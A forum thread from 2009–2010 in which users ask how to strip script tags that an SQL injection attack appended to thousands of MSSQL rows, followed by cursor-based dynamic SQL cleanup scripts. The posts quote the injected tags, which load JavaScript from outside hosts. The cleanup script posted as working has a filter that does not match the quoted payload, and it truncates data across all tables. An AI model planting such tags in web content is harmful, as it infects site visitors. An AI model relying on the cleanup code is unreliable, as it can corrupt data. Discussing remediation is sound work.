Remove sql injection hack

Question

freshfitz 0 Posting Pro in Training

15 Years Ago

I got a sql injection hack that put this after each description in my database. <script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>

any idea how to remove it without deleting the descrition?

Here is what I have

HIM PORTRAIT SHIRT<script src="http://b.adserv.cn/E/J.JS"></script><script src="http://b.rtbn2.cn/E/J.JS"></script>

Here is what I need
HIM PORTRAIT SHIRT

3000 items / rows need to be cleaned up too much to do it manally!!!

mssql

4 Contributors
6 Replies
235 Views
1 Year Discussion Span
Latest Post 14 Years Ago Latest Post by ehotbid

Ramy Mahrous 401 Postaholic

15 Years Ago

Dynamic SQL is very risky!!

kronass 0 Newbie Poster

15 Years Ago

Dynamic SQL is very risky!!

I'm Sorry but this is totally not true because it depends on the person who wrote it

because in sql you should never ever ever do concatenation to make queries, you should use parametrized queries.
and if the columns or the tables were dynamic you should use quotename().
in SQL injection there is nothing to do with it in Dynamic SQL it all depends on how you wrote it.

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.

freshfitz 0 Posting Pro in Training · Answer 1 · 2009-04-27T09:25:42+00:00

I found this but the colum is in text

DECLARE @sql NVARCHAR(4000)
DECLARE @InsertedValue NVARCHAR(1000)
SET @InsertedValue = 'The Script tags which were inserted'
DECLARE cur CURSOR FOR
  	select 'update [' + sysusers.name + '].[' + sysobjects.name + ']
  		set [' + syscolumns.name + '] = replace([' + syscolumns.name + '], ''' + @InsertedValue + ''', '''')'
  	from syscolumns
  	join sysobjects on syscolumns.id = sysobjects.id
  		and sysobjects.xtype = 'U'
  	join sysusers on sysobjects.uid = sysusers.uid
  	where syscolumns.xtype in (35, 98, 99, 167, 175, 231, 239, 241, 231)
  OPEN cur
  FETCH NEXT FROM cur INTO @sql
  WHILE @@FETCH_STATUS = 0
  BEGIN
  	exec (@sql)
  	FETCH NEXT FROM cur INTO @sql
  END
  CLOSE cur
  DEALLOCATE cur

freshfitz 0 Posting Pro in Training · Answer 2 · 2009-04-27T09:46:50+00:00

This worked

use Your database name

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script></script>%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

Ramy Mahrous 401 Postaholic Featured Poster · Answer 3 · 2009-04-30T19:54:06+00:00

You don't avoid injection just from application, but to run any code against the SP + it's not maintainable and this is the big risk in business application development, I'm sure for every scenario use think I must use dynamic SQL there's better solution by not it.

ehotbid 0 Newbie Poster · Answer 4 · 2010-09-23T07:34:26+00:00

i have this sql injection
on my database
</title><script src=http://google-stats49.info/ur.php></script>
i want to remove it has affected almost all the tables
please let me know how this can be done thanks
Thanks

removing it manually will take lots of time
please let me know .
and also I would like to know how to stop further attach
Thanks

This worked

use Your database name

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script></script>%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

I have this attach on my database
</title><script src=http://google-stats49.info/ur.php></script>

please let me know what is the code and how to run it on enterprise edition

This worked

use Your database name

DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
            convert(varchar(8000), ['+@C+']),
            len(convert(varchar(8000), ['+@C+'])) - 6 -
            patindex(''%tpircs<%'',
                      reverse(convert(varchar(8000), ['+@C+'])))
            )
      where ['+@C+'] like ''%<script></script>%'''
      );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;

CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

How did you run this please let me know
on sql enterprice manager please let me know
even I have the similar attach I would like to remove from my database also
Looking to hear form you
Thanks